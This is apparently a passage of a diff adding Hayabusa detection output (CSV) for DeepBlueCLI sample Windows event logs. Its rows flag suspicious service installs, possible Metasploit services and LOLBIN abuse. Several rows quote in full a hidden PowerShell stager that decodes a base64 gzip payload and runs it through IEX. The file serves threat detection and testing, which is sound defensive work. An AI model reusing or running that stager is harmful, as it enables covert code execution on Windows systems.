QrnhkB0f94CkGkfY64OPVynZvgs++iekferwqIQXGkca+BiTB8A1XhldBva7QYkji3VGGLUmW0NVi+NuGdULdFjzULIk9rQeRtGjvtPVouVwZ/i5M3ZVuCkvVb1yt7JdVVXXdb1pT4qbL7eXZa3wUFnSJbsvOerV4IsWrJte99FzesPL/qazvYf9BqpqfUz0AwLKiF2r3LjCV1E1PJHEa7d/G4eRjxlIBW70tHANHhrH67nLaRIhy889e0HCgDDoc9AJU9UjxriddIun2xy61aGHzKCABzA8L/1ypEhPjspzE0lfXV9PAC7U0pPM8y0SeMLPFTbnhQJ0g8KmXICjv/2cFb7ays/r5ZKWckrai83YfjMlqbgM3/Xsi0t+rv8PtB4r3ocf5y20Pr/7F+ubqC7kXpDxk/Xli//E/O9RMcRUgLsJtxcjh776OiNHTZ18jTxlDRTjHp/k4/A2Fmcd+FL5G8KtLTuVCgAA'));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa3c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 05:59:41.659 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,"Svc: TDhDnlnsrKrQVnjY | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIALxR4FcCA7VWf2/aSBD9O5X6HawKCVslGAhpmkiVbo0xEDABHCCGotPGXpuFxUvs5Wev3/3GYDdUTar0pLMSseuZ2X375s2OvVXgCMoDaYltQ/r2/t1ZB4d4IckZl667NmZ2Tsp4wa7aLClnZ2DOrM1OoNXYcqTXpC+SPEbLpc4XmAaTm5vKKgxJII7zfI0IFEVk8cgoiWRF+kcaTklIzu8eZ8QR0jcp83e+xvgjZonbroKdKZHOUeDGthZ3cIwtby0ZFXL269esMj4vTvLVpxVmkZy1dpEgi7zLWFaRvivxhve7JZGzJnVCHnFP5Ic0uCjl+0GEPdKG1dbEJGLK3SirwGHgLyRiFQbS6bHidY5echaGnZA7yHVDEkFQvhGs+ZzImWDFWE76Sx4nIHqrQNAFAbsgIV9aJFxTh0T5Og5cRnrEm8htsknP/tYg+TQIvDoiVHKQnNfRmtxdMXJcIKv8ivdHXhV4nnMLbHx//+79Oy/VQ3TZs4K/69v1qShgdDY+jAkAljs8ogfnL1IhJ5mwJxY83ME0cx+uiDKRxnE+xpOJlGHuZTn3enwxdQbXPbl4uIR34wGn7gRiklRlvO4wWG/KmMbG13WnE48GRN8FeEGdVFryS/QTj5HDcfOpWxugydnEQFydMOJjETOZk8a/hlUXVPyI1VaUuSREDqQwAlSQXeVnMMfkyNlGYJIFMHWcZ+M0gKBJ6p2IeJfuHs/BKVthOIpyUmcFFeXkJItgRtychIKIJia0EvwwzD7DNVdMUAdHIl1uovxEZrJphQeRCFcOZBAIuLeWxKGYxXzkpDp1ibazqJ9unn2RjQpmjAY+rLSGbMCbmAVLxLoIAedBA0reIqKxWDKyAJ9DfRsM+1DNSTEchIR94mZfhJlK/ajrmJWUjhOQkGqLcZGTBjQUcFfEDB9U9d9AnFwTz3AqIUlSI6fFM9Z2IlZ7ZtrdOsOeE8s0YenASSiADyPkCw1H5FPZEiGwJX9Q72gFwWM3AmY62pwW0YYWGyb89+lFg+tXbvN2VldDfTv1UCNqmPWO3q3Xy+tba1AWVrUhmp2GMKsPs5mF6r2+LUYNVL+nhbld3i9v6d5qIdfeqp/22n5T0Lb7me96tu55/pVn9YqXBm0NK12tUMItvbpqDbWNVihHVbqpd2m/O781xKM9YLjvqf5D8RrTbSucDYrc3DcQqk0vnP2tN6hNTXdn19XrYXmOqghVgurA0HjT1kLUUQfYH/BNc1ZjQ7+CNMOhZNTtG1q3a2ioX5s96deqD7EPeKoNByU6Wj70pjA3AEJTLZQbLtlzuwsk1TjCfg98/ErJmXrgo39E2sc2j0p4rnGkgY8xegJc9tLoMLDf90scDVj7AaPWaGeoatHulFG9QIc1H8VLYl/rYhSt9b2uFgcud4eXbdtTBw/sStUr90vHU1V1U9ebzqi4/Xx3VdYKT5UFXbDHkqte9z9rwabpd9a+2x1e9bbt3SPs11fVwYdYOyCezGJ2vTSvTtTw2r1v4jCaYgYqgZs8LVeDh0ZyK3c4jSNk+dCt5yQMCIP2Bg0wVTpijDtxi3i+v6FHHTvHBIq2D8OL0osjRfrhqDw3jvTVzc0IoEL9JNrOt0jgi2musL0oFOD2L2zLBTjv209Y4cudnK6WixtIwtPJHuywhxLXVsaf96In1Pp/WUyKego/7ptYfH73G+ubmC3k0vP/Yvj5xR+x/McMDDEV4GnBzcTIsV3+hohEOSffGUmaQBde8sQffncrcd6GL5B/AQG25GNvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 05:59:41.659 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,"Svc: TDhDnlnsrKrQVnjY | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIALxR4FcCA7VWf2/aSBD9O5X6HawKCVslGAhpmkiVbo0xEDABHCCGotPGXpuFxUvs5Wev3/3GYDdUTar0pLMSseuZ2X375s2OvVXgCMoDaYltQ/r2/t1ZB4d4IckZl667NmZ2Tsp4wa7aLClnZ2DOrM1OoNXYcqTXpC+SPEbLpc4XmAaTm5vKKgxJII7zfI0IFEVk8cgoiWRF+kcaTklIzu8eZ8QR0jcp83e+xvgjZonbroKdKZHOUeDGthZ3cIwtby0ZFXL269esMj4vTvLVpxVmkZy1dpEgi7zLWFaRvivxhve7JZGzJnVCHnFP5Ic0uCjl+0GEPdKG1dbEJGLK3SirwGHgLyRiFQbS6bHidY5echaGnZA7yHVDEkFQvhGs+ZzImWDFWE76Sx4nIHqrQNAFAbsgIV9aJFxTh0T5Og5cRnrEm8htsknP/tYg+TQIvDoiVHKQnNfRmtxdMXJcIKv8ivdHXhV4nnMLbHx//+79Oy/VQ3TZs4K/69v1qShgdDY+jAkAljs8ogfnL1IhJ5mwJxY83ME0cx+uiDKRxnE+xpOJlGHuZTn3enwxdQbXPbl4uIR34wGn7gRiklRlvO4wWG/KmMbG13WnE48GRN8FeEGdVFryS/QTj5HDcfOpWxugydnEQFydMOJjETOZk8a/hlUXVPyI1VaUuSREDqQwAlSQXeVnMMfkyNlGYJIFMHWcZ+M0gKBJ6p2IeJfuHs/BKVthOIpyUmcFFeXkJItgRtychIKIJia0EvwwzD7DNVdMUAdHIl1uovxEZrJphQeRCFcOZBAIuLeWxKGYxXzkpDp1ibazqJ9unn2RjQpmjAY+rLSGbMCbmAVLxLoIAedBA0reIqKxWDKyAJ9DfRsM+1DNSTEchIR94mZfhJlK/ajrmJWUjhOQkGqLcZGTBjQUcFfEDB9U9d9AnFwTz3AqIUlSI6fFM9Z2IlZ7ZtrdOsOeE8s0YenASSiADyPkCw1H5FPZEiGwJX9Q72gFwWM3AmY62pwW0YYWGyb89+lFg+tXbvN2VldDfTv1UCNqmPWO3q3Xy+tba1AWVrUhmp2GMKsPs5mF6r2+LUYNVL+nhbld3i9v6d5qIdfeqp/22n5T0Lb7me96tu55/pVn9YqXBm0NK12tUMItvbpqDbWNVihHVbqpd2m/O781xKM9YLjvqf5D8RrTbSucDYrc3DcQqk0vnP2tN6hNTXdn19XrYXmOqghVgurA0HjT1kLUUQfYH/BNc1ZjQ7+CNMOhZNTtG1q3a2ioX5s96deqD7EPeKoNByU6Wj70pjA3AEJTLZQbLtlzuwsk1TjCfg98/ErJmXrgo39E2sc2j0p4rnGkgY8xegJc9tLoMLDf90scDVj7AaPWaGeoatHulFG9QIc1H8VLYl/rYhSt9b2uFgcud4eXbdtTBw/sStUr90vHU1V1U9ebzqi4/Xx3VdYKT5UFXbDHkqte9z9rwabpd9a+2x1e9bbt3SPs11fVwYdYOyCezGJ2vTSvTtTw2r1v4jCaYgYqgZs8LVeDh0ZyK3c4jSNk+dCt5yQMCIP2Bg0wVTpijDtxi3i+v6FHHTvHBIq2D8OL0osjRfrhqDw3jvTVzc0IoEL9JNrOt0jgi2musL0oFOD2L2zLBTjv209Y4cudnK6WixtIwtPJHuywhxLXVsaf96In1Pp/WUyKego/7ptYfH73G+ubmC3k0vP/Yvj5xR+x/McMDDEV4GnBzcTIsV3+hohEOSffGUmaQBde8sQffncrcd6GL5B/AQG25GNvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 05:59:41.659 +09:00,IE10Win7,7045,info,Persis,Service Installed,"Name: TDhDnlnsrKrQVnjY | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIALxR4FcCA7VWf2/aSBD9O5X6HawKCVslGAhpmkiVbo0xEDABHCCGotPGXpuFxUvs5Wev3/3GYDdUTar0pLMSseuZ2X375s2OvVXgCMoDaYltQ/r2/t1ZB4d4IckZl667NmZ2Tsp4wa7aLClnZ2DOrM1OoNXYcqTXpC+SPEbLpc4XmAaTm5vKKgxJII7zfI0IFEVk8cgoiWRF+kcaTklIzu8eZ8QR0jcp83e+xvgjZonbroKdKZHOUeDGthZ3cIwtby0ZFXL269esMj4vTvLVpxVmkZy1dpEgi7zLWFaRvivxhve7JZGzJnVCHnFP5Ic0uCjl+0GEPdKG1dbEJGLK3SirwGHgLyRiFQbS6bHidY5echaGnZA7yHVDEkFQvhGs+ZzImWDFWE76Sx4nIHqrQNAFAbsgIV9aJFxTh0T5Og5cRnrEm8htsknP/tYg+TQIvDoiVHKQnNfRmtxdMXJcIKv8ivdHXhV4nnMLbHx//+79Oy/VQ3TZs4K/69v1qShgdDY+jAkAljs8ogfnL1IhJ5mwJxY83ME0cx+uiDKRxnE+xpOJlGHuZTn3enwxdQbXPbl4uIR34wGn7gRiklRlvO4wWG/KmMbG13WnE48GRN8FeEGdVFryS/QTj5HDcfOpWxugydnEQFydMOJjETOZk8a/hlUXVPyI1VaUuSREDqQwAlSQXeVnMMfkyNlGYJIFMHWcZ+M0gKBJ6p2IeJfuHs/BKVthOIpyUmcFFeXkJItgRtychIKIJia0EvwwzD7DNVdMUAdHIl1uovxEZrJphQeRCFcOZBAIuLeWxKGYxXzkpDp1ibazqJ9unn2RjQpmjAY+rLSGbMCbmAVLxLoIAedBA0reIqKxWDKyAJ9DfRsM+1DNSTEchIR94mZfhJlK/ajrmJWUjhOQkGqLcZGTBjQUcFfEDB9U9d9AnFwTz3AqIUlSI6fFM9Z2IlZ7ZtrdOsOeE8s0YenASSiADyPkCw1H5FPZEiGwJX9Q72gFwWM3AmY62pwW0YYWGyb89+lFg+tXbvN2VldDfTv1UCNqmPWO3q3Xy+tba1AWVrUhmp2GMKsPs5mF6r2+LUYNVL+nhbld3i9v6d5qIdfeqp/22n5T0Lb7me96tu55/pVn9YqXBm0NK12tUMItvbpqDbWNVihHVbqpd2m/O781xKM9YLjvqf5D8RrTbSucDYrc3DcQqk0vnP2tN6hNTXdn19XrYXmOqghVgurA0HjT1kLUUQfYH/BNc1ZjQ7+CNMOhZNTtG1q3a2ioX5s96deqD7EPeKoNByU6Wj70pjA3AEJTLZQbLtlzuwsk1TjCfg98/ErJmXrgo39E2sc2j0p4rnGkgY8xegJc9tLoMLDf90scDVj7AaPWaGeoatHulFG9QIc1H8VLYl/rYhSt9b2uFgcud4eXbdtTBw/sStUr90vHU1V1U9ebzqi4/Xx3VdYKT5UFXbDHkqte9z9rwabpd9a+2x1e9bbt3SPs11fVwYdYOyCezGJ2vTSvTtTw2r1v4jCaYgYqgZs8LVeDh0ZyK3c4jSNk+dCt5yQMCIP2Bg0wVTpijDtxi3i+v6FHHTvHBIq2D8OL0osjRfrhqDw3jvTVzc0IoEL9JNrOt0jgi2musL0oFOD2L2zLBTjv209Y4cudnK6WixtIwtPJHuywhxLXVsaf96In1Pp/WUyKego/7ptYfH73G+ubmC3k0vP/Yvj5xR+x/McMDDEV4GnBzcTIsV3+hohEOSffGUmaQBde8sQffncrcd6GL5B/AQG25GNvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 05:59:41.676 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIALxR4FcCA7VWf2/aSBD9O5X6HawKCVslGAhpmkiVbo0xEDABHCCGotPGXpuFxUvs5Wev3/3GYDdUTar0pLMSseuZ2X375s2OvVXgCMoDaYltQ/r2/t1ZB4d4IckZl667NmZ2Tsp4wa7aLClnZ2DOrM1OoNXYcqTXpC+SPEbLpc4XmAaTm5vKKgxJII7zfI0IFEVk8cgoiWRF+kcaTklIzu8eZ8QR0jcp83e+xvgjZonbroKdKZHOUeDGthZ3cIwtby0ZFXL269esMj4vTvLVpxVmkZy1dpEgi7zLWFaRvivxhve7JZGzJnVCHnFP5Ic0uCjl+0GEPdKG1dbEJGLK3SirwGHgLyRiFQbS6bHidY5echaGnZA7yHVDEkFQvhGs+ZzImWDFWE76Sx4nIHqrQNAFAbsgIV9aJFxTh0T5Og5cRnrEm8htsknP/tYg+TQIvDoiVHKQnNfRmtxdMXJcIKv8ivdHXhV4nnMLbHx//+79Oy/VQ3TZs4K/69v1qShgdDY+jAkAljs8ogfnL1IhJ5mwJxY83ME0cx+uiDKRxnE+xpOJlGHuZTn3enwxdQbXPbl4uIR34wGn7gRiklRlvO4wWG/KmMbG13WnE48GRN8FeEGdVFryS/QTj5HDcfOpWxugydnEQFydMOJjETOZk8a/hlUXVPyI1VaUuSREDqQwAlSQXeVnMMfkyNlGYJIFMHWcZ+M0gKBJ6p2IeJfuHs/BKVthOIpyUmcFFeXkJItgRtychIKIJia0EvwwzD7DNVdMUAdHIl1uovxEZrJphQeRCFcOZBAIuLeWxKGYxXzkpDp1ibazqJ9unn2RjQpmjAY+rLSGbMCbmAVLxLoIAedBA0reIqKxWDKyAJ9DfRsM+1DNSTEchIR94mZfhJlK/ajrmJWUjhOQkGqLcZGTBjQUcFfEDB9U9d9AnFwTz3AqIUlSI6fFM9Z2IlZ7ZtrdOsOeE8s0YenASSiADyPkCw1H5FPZEiGwJX9Q72gFwWM3AmY62pwW0YYWGyb89+lFg+tXbvN2VldDfTv1UCNqmPWO3q3Xy+tba1AWVrUhmp2GMKsPs5mF6r2+LUYNVL+nhbld3i9v6d5qIdfeqp/22n5T0Lb7me96tu55/pVn9YqXBm0NK12tUMItvbpqDbWNVihHVbqpd2m/O781xKM9YLjvqf5D8RrTbSucDYrc3DcQqk0vnP2tN6hNTXdn19XrYXmOqghVgurA0HjT1kLUUQfYH/BNc1ZjQ7+CNMOhZNTtG1q3a2ioX5s96deqD7EPeKoNByU6Wj70pjA3AEJTLZQbLtlzuwsk1TjCfg98/ErJmXrgo39E2sc2j0p4rnGkgY8xegJc9tLoMLDf90scDVj7AaPWaGeoatHulFG9QIc1H8VLYl/rYhSt9b2uFgcud4eXbdtTBw/sStUr90vHU1V1U9ebzqi4/Xx3VdYKT5UFXbDHkqte9z9rwabpd9a+2x1e9bbt3SPs11fVwYdYOyCezGJ2vTSvTtTw2r1v4jCaYgYqgZs8LVeDh0ZyK3c4jSNk+dCt5yQMCIP2Bg0wVTpijDtxi3i+v6FHHTvHBIq2D8OL0osjRfrhqDw3jvTVzc0IoEL9JNrOt0jgi2musL0oFOD2L2zLBTjv209Y4cudnK6WixtIwtPJHuywhxLXVsaf96In1Pp/WUyKego/7ptYfH73G+ubmC3k0vP/Yvj5xR+x/McMDDEV4GnBzcTIsV3+hohEOSffGUmaQBde8sQffncrcd6GL5B/AQG25GNvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\cmd.exe | PID: 0xe28 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 05:59:41.680 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIALxR4FcCA7VWf2/aSBD9O5X6HawKCVslGAhpmkiVbo0xEDABHCCGotPGXpuFxUvs5Wev3/3GYDdUTar0pLMSseuZ2X375s2OvVXgCMoDaYltQ/r2/t1ZB4d4IckZl667NmZ2Tsp4wa7aLClnZ2DOrM1OoNXYcqTXpC+SPEbLpc4XmAaTm5vKKgxJII7zfI0IFEVk8cgoiWRF+kcaTklIzu8eZ8QR0jcp83e+xvgjZonbroKdKZHOUeDGthZ3cIwtby0ZFXL269esMj4vTvLVpxVmkZy1dpEgi7zLWFaRvivxhve7JZGzJnVCHnFP5Ic0uCjl+0GEPdKG1dbEJGLK3SirwGHgLyRiFQbS6bHidY5echaGnZA7yHVDEkFQvhGs+ZzImWDFWE76Sx4nIHqrQNAFAbsgIV9aJFxTh0T5Og5cRnrEm8htsknP/tYg+TQIvDoiVHKQnNfRmtxdMXJcIKv8ivdHXhV4nnMLbHx//+79Oy/VQ3TZs4K/69v1qShgdDY+jAkAljs8ogfnL1IhJ5mwJxY83ME0cx+uiDKRxnE+xpOJlGHuZTn3enwxdQbXPbl4uIR34wGn7gRiklRlvO4wWG/KmMbG13WnE48GRN8FeEGdVFryS/QTj5HDcfOpWxugydnEQFydMOJjETOZk8a/hlUXVPyI1VaUuSREDqQwAlSQXeVnMMfkyNlGYJIFMHWcZ+M0gKBJ6p2IeJfuHs/BKVthOIpyUmcFFeXkJItgRtychIKIJia0EvwwzD7DNVdMUAdHIl1uovxEZrJphQeRCFcOZBAIuLeWxKGYxXzkpDp1ibazqJ9unn2RjQpmjAY+rLSGbMCbmAVLxLoIAedBA0reIqKxWDKyAJ9DfRsM+1DNSTEchIR94mZfhJlK/ajrmJWUjhOQkGqLcZGTBjQUcFfEDB9U9d9AnFwTz3AqIUlSI6fFM9Z2IlZ7ZtrdOsOeE8s0YenASSiADyPkCw1H5FPZEiGwJX9Q72gFwWM3AmY62pwW0YYWGyb89+lFg+tXbvN2VldDfTv1UCNqmPWO3q3Xy+tba1AWVrUhmp2GMKsPs5mF6r2+LUYNVL+nhbld3i9v6d5qIdfeqp/22n5T0Lb7me96tu55/pVn9YqXBm0NK12tUMItvbpqDbWNVihHVbqpd2m/O781xKM9YLjvqf5D8RrTbSucDYrc3DcQqk0vnP2tN6hNTXdn19XrYXmOqghVgurA0HjT1kLUUQfYH/BNc1ZjQ7+CNMOhZNTtG1q3a2ioX5s96deqD7EPeKoNByU6Wj70pjA3AEJTLZQbLtlzuwsk1TjCfg98/ErJmXrgo39E2sc2j0p4rnGkgY8xegJc9tLoMLDf90scDVj7AaPWaGeoatHulFG9QIc1H8VLYl/rYhSt9b2uFgcud4eXbdtTBw/sStUr90vHU1V1U9ebzqi4/Xx3VdYKT5UFXbDHkqte9z9rwabpd9a+2x1e9bbt3SPs11fVwYdYOyCezGJ2vTSvTtTw2r1v4jCaYgYqgZs8LVeDh0ZyK3c4jSNk+dCt5yQMCIP2Bg0wVTpijDtxi3i+v6FHHTvHBIq2D8OL0osjRfrhqDw3jvTVzc0IoEL9JNrOt0jgi2musL0oFOD2L2zLBTjv209Y4cudnK6WixtIwtPJHuywhxLXVsaf96In1Pp/WUyKego/7ptYfH73G+ubmC3k0vP/Yvj5xR+x/McMDDEV4GnBzcTIsV3+hohEOSffGUmaQBde8sQffncrcd6GL5B/AQG25GNvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd2c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 05:59:41.854 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""powershell.exe"" -nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIALxR4FcCA7VWf2/aSBD9O5X6HawKCVslGAhpmkiVbo0xEDABHCCGotPGXpuFxUvs5Wev3/3GYDdUTar0pLMSseuZ2X375s2OvVXgCMoDaYltQ/r2/t1ZB4d4IckZl667NmZ2Tsp4wa7aLClnZ2DOrM1OoNXYcqTXpC+SPEbLpc4XmAaTm5vKKgxJII7zfI0IFEVk8cgoiWRF+kcaTklIzu8eZ8QR0jcp83e+xvgjZonbroKdKZHOUeDGthZ3cIwtby0ZFXL269esMj4vTvLVpxVmkZy1dpEgi7zLWFaRvivxhve7JZGzJnVCHnFP5Ic0uCjl+0GEPdKG1dbEJGLK3SirwGHgLyRiFQbS6bHidY5echaGnZA7yHVDEkFQvhGs+ZzImWDFWE76Sx4nIHqrQNAFAbsgIV9aJFxTh0T5Og5cRnrEm8htsknP/tYg+TQIvDoiVHKQnNfRmtxdMXJcIKv8ivdHXhV4nnMLbHx//+79Oy/VQ3TZs4K/69v1qShgdDY+jAkAljs8ogfnL1IhJ5mwJxY83ME0cx+uiDKRxnE+xpOJlGHuZTn3enwxdQbXPbl4uIR34wGn7gRiklRlvO4wWG/KmMbG13WnE48GRN8FeEGdVFryS/QTj5HDcfOpWxugydnEQFydMOJjETOZk8a/hlUXVPyI1VaUuSREDqQwAlSQXeVnMMfkyNlGYJIFMHWcZ+M0gKBJ6p2IeJfuHs/BKVthOIpyUmcFFeXkJItgRtychIKIJia0EvwwzD7DNVdMUAdHIl1uovxEZrJphQeRCFcOZBAIuLeWxKGYxXzkpDp1ibazqJ9unn2RjQpmjAY+rLSGbMCbmAVLxLoIAedBA0reIqKxWDKyAJ9DfRsM+1DNSTEchIR94mZfhJlK/ajrmJWUjhOQkGqLcZGTBjQUcFfEDB9U9d9AnFwTz3AqIUlSI6fFM9Z2IlZ7ZtrdOsOeE8s0YenASSiADyPkCw1H5FPZEiGwJX9Q72gFwWM3AmY62pwW0YYWGyb89+lFg+tXbvN2VldDfTv1UCNqmPWO3q3Xy+tba1AWVrUhmp2GMKsPs5mF6r2+LUYNVL+nhbld3i9v6d5qIdfeqp/22n5T0Lb7me96tu55/pVn9YqXBm0NK12tUMItvbpqDbWNVihHVbqpd2m/O781xKM9YLjvqf5D8RrTbSucDYrc3DcQqk0vnP2tN6hNTXdn19XrYXmOqghVgurA0HjT1kLUUQfYH/BNc1ZjQ7+CNMOhZNTtG1q3a2ioX5s96deqD7EPeKoNByU6Wj70pjA3AEJTLZQbLtlzuwsk1TjCfg98/ErJmXrgo39E2sc2j0p4rnGkgY8xegJc9tLoMLDf90scDVj7AaPWaGeoatHulFG9QIc1H8VLYl/rYhSt9b2uFgcud4eXbdtTBw/sStUr90vHU1V1U9ebzqi4/Xx3VdYKT5UFXbDHkqte9z9rwabpd9a+2x1e9bbt3SPs11fVwYdYOyCezGJ2vTSvTtTw2r1v4jCaYgYqgZs8LVeDh0ZyK3c4jSNk+dCt5yQMCIP2Bg0wVTpijDtxi3i+v6FHHTvHBIq2D8OL0osjRfrhqDw3jvTVzc0IoEL9JNrOt0jgi2musL0oFOD2L2zLBTjv209Y4cudnK6WixtIwtPJHuywhxLXVsaf96In1Pp/WUyKego/7ptYfH73G+ubmC3k0vP/Yvj5xR+x/McMDDEV4GnBzcTIsV3+hohEOSffGUmaQBde8sQffncrcd6GL5B/AQG25GNvCgAA'));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc00 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 06:00:23.453 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: QPFRRKggYorFrGnJ | Path: %SYSTEMROOT%\OJuUfMOy.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 06:00:23.453 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: QPFRRKggYorFrGnJ | Path: %SYSTEMROOT%\OJuUfMOy.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 06:00:23.453 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: QPFRRKggYorFrGnJ | Path: %SYSTEMROOT%\OJuUfMOy.exe | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 06:00:33.473 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SpyNetService -RestrictPrivileges -AccessKey CC5A59EB-39B8-70D1-D323-21B5170E809F | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xb1c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 06:00:33.590 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SpyNetService -RestrictPrivileges -AccessKey CC5A59EB-39B8-70D1-D323-21B5170E809F -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xd30 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
